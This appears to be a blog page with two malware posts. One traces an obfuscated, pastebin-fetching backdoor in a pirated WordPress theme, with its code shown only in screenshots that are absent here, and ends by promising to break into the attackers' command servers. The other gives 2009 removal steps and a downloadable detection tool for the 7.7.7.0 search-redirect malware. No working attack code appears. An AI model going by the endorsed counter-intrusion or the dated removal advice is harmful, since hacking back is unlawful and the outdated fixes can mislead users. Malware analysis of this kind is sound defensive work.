Part 1: Analysis of a WordPress Malware

I had some time at lunch to kill, so I decided to see how Malware techniques were improving in the land of WordPress and free premium theme download sites.

Enter the Darknet.

A simple Google search got me a theme ZIP file pretty quickly.  Now, it was time to see what malicious happenings this thing would cause.

Unpacked, here’s the structure of the ZIP file.

.
├── functions.php
├── home.php
├── images
│   ├── arrow.png
│   ├── bg-pattern.png
│   ├── bg.png
│   ├── blockquote.png
│   ├── blue
│   │   ├── gradient.png
│   │   ├── logo.png
│   │   ├── logo-texture.png
│   │   ├── logo-vert-left.png
│   │   └── logo-vert-right.png
│   ├── favicon.ico
│   ├── footer-twitter.png
│   ├── footer-widgets.png
│   ├── gradient.png
│   ├── green
│   │   ├── gradient.png
│   │   ├── logo.png
│   │   ├── logo-texture.png
│   │   ├── logo-vert-left.png
│   │   └── logo-vert-right.png
│   ├── icon-dot.png
│   ├── list-after-post.png
│   ├── list.png
│   ├── logo.png
│   ├── logo-texture.png
│   ├── logo-vert-left.png
│   ├── logo-vert-right.png
│   ├── red
│   │   ├── gradient.png
│   │   ├── logo.png
│   │   ├── logo-texture.png
│   │   ├── logo-vert-left.png
│   │   └── logo-vert-right.png
│   ├── rss.png
│   ├── social-icons.png
│   └── twitter-nav.png
├── page_landing.php
├── page_landing2.php
├── README.txt
├── screenshot.png
└── style.css

Right off the bat, page_landing2.php sticks out to me. Let’s take a look.

Oh. Would you look at that fun. Time to see what this is doing.

First, I don’t like trying to read the garbled code, so I “prettify” it.

Ok, so let’s decode the above to make it readable.

There are a few interesting pieces here.

These interest me because they are making a call to a website to get additional payload/scripts. Let’s see what they are. =)

The first one, pastebin link, shows me this garbled shit. What I really care about is the compressed base64 at the end.

So, now I look to deobfuscating the compressed/base64 garbage… Here’s part of the file, my screencapture died when my computer automatically locked; [FIXME]

NOTE: Click on the image for a higher resolution. It’s like 62k pixels tall, lol.

 

What I’m interested in is the top of this file.

So again, uncompressing the base64 encoding of that gives me the following file.

Going back for a minute the the previous garbled shit $plsym variable which contains the compressed/base64 is decompressed and unencoded and saved as a perl file.

At this point, I have everything I need to begin to follow this even deeper into the dark underworld. There are a few domains (which I didn’t highlight in this article, but you can find them in the screenshots) and some passwords.

Stay tuned… in the next update, I show you what happens when I infiltrate their command servers. Much fun!

Google, MSN, Yahoo Search 7.7.7.0 Redirector Malware HiJack

Google 7.7.7.0 Redirect Malware, Virus, Spyware…

UPDATE (9/29/2011 9:15AM EST)
I have corrected the link to the 7770finder.exe file. This still detects the original strain of this piece of malware. To fully innoculate and protect yourself, I recommend downloading Malwarebytes’ Anti-Malware software:http://www.malwarebytes.org/. It’s FREE for personal use!

UPDATE (1/19/2009 6:30PM EST)

I’ve been getting a lot of email questioning why my tool did not remove found infected files.  This tool does NOT remove any infected files.  It is up to you to remove them.  This tool also does not support directory recursion;  e.g., it ONLY scans %SystemDir% files, no subfolders.  Sorry.

UPDATE (1/15/2009 12:51PM EST)

I have been able to successfully re-infect myself and I can confirm this is being distributed via PDF JavaScript as I was monitoring processes and my system32 directory as I visited a known vulnerable site.  I also saw ~.exe process start up during my monitoring after I saw Acrobat.exe and acrotray.exe start up.  Once infected, the processes (Acrobat, Acrotray) terminated.

To help prevent infection take the following actions:

Adober Reader: Disable Adobe JavaScript functionality (Edit -> Preferences, go to JavaScript entry and untick “Enable Acrobat JavaScript”)

Foxit Reader: Edit -> Preferences -> JavaScript (Uncheck the box)

Use NoScript Firefox Plugin

Tips thanks to Edvard and app103 over at DonationCoder

UPDATE (1/14/2009 11:17PM EST)

Update your PDF application and disable JavaScript.

UPDATE (1/14/2009)
Malwarebytes is able to detect the malware.   Interestingly enough, it only detects it if it’s in c:windowssystem32drivers folder.  I’m not sure what’s up with that. Update the applications to ensure you’re using the latest definitions.  If you know of any other Spyware/Malware/AV software that is detecting this, leave a comment.

AVG supposedly detects this threat (posted by: Peter Liu)

Please let me know of any other software that detects this.

 

Here’s what I know about this lovely little malware that hijacks Google, MSN Live, and I’m sure a few other popular search engines by injecting javascript in the header:

1) Redirects searches to 7.7.7.0

2) Displays what appear to be normal results, but in fact are linked to many other malware centric sites

3) Kaspersky (as of this writing) is the only application to detect the presence of this malware on your PC (and yes I’ve tried Malware Bytes, Spybot S&D, AntiVir, SuperSpyware)

4) The culprit file resides in c:\windows\system32\wdmaud.sys and should be removed, or renamed.  Don’t remove the file from c:\windows\system32\drivers\wdmaud.sys.

5) After deleting/renaming the file, restart your browser(s) and you’ll be OK.  Note:  This affects IE and FF, I have not tested Opera, Netscape or Safari.

Here’s an example screenshot of what Google results look like when you are infected.  Notice the Google links (green links) on the results page.

untitled

What I’d like to know is what that file has to do with the browser.  The WDMAUD.sys file (the real one) deals with Windows High Definition Audio.  Could this file have been placed there via Flash vulnerability?  I know I was on YouTube the night prior to me being invaded.

I ran ProcessMon from SysInternals and saw that Firefox and IE both called for wdmaud.sys but in the c:\windows\system32 directory, not in the drivers subfolder.  Here’s a screenshot of that.  If I move the file (the infected file) out of system32 the redirection stops.  If I put it back in the infection is back.  My question that is burning me is HOW did it get there?  What put it there?

procmon1

Process Monitor highlighting the search request for wdmaud.sys

Removal Instructions

So far, the infection is in c:\windows\system32\wdmaud.sys (or c:\winnt\system32\wdmaud.sys).  Simply delete the file and restart any open web browsers.

Detection Tool

If you do not find the wdmaud.sys file, or are unsure what to even look for, you may download a tool that we created that will investigate all the files in the Windows system directory.  It doesn’t just specifically look for the wdmaud.sys file, but it looks for the signature in every file within that directory.

Compatible with:  Windows XP (all SPs), Server 2000/2003/2008, and Vista.

Your use of this software indicates that you agree to the attached terms of service.

Download Tool Here (EXE) (md5:74705f9d02ae429f6ca84662ac755621)

Tool Update (1/16/2009)

* Prints path of file that is infected

* Allows program to accept a path as an argument;  otherwise it uses %SystemDir% as default if no path specified

* Still no recursion -yet-

If you download the tool and find it useful, or don’t find it useful, I’d appreciate any feedback.  You can leave a comment or send any questions/comments to rjkreider@gmail.com.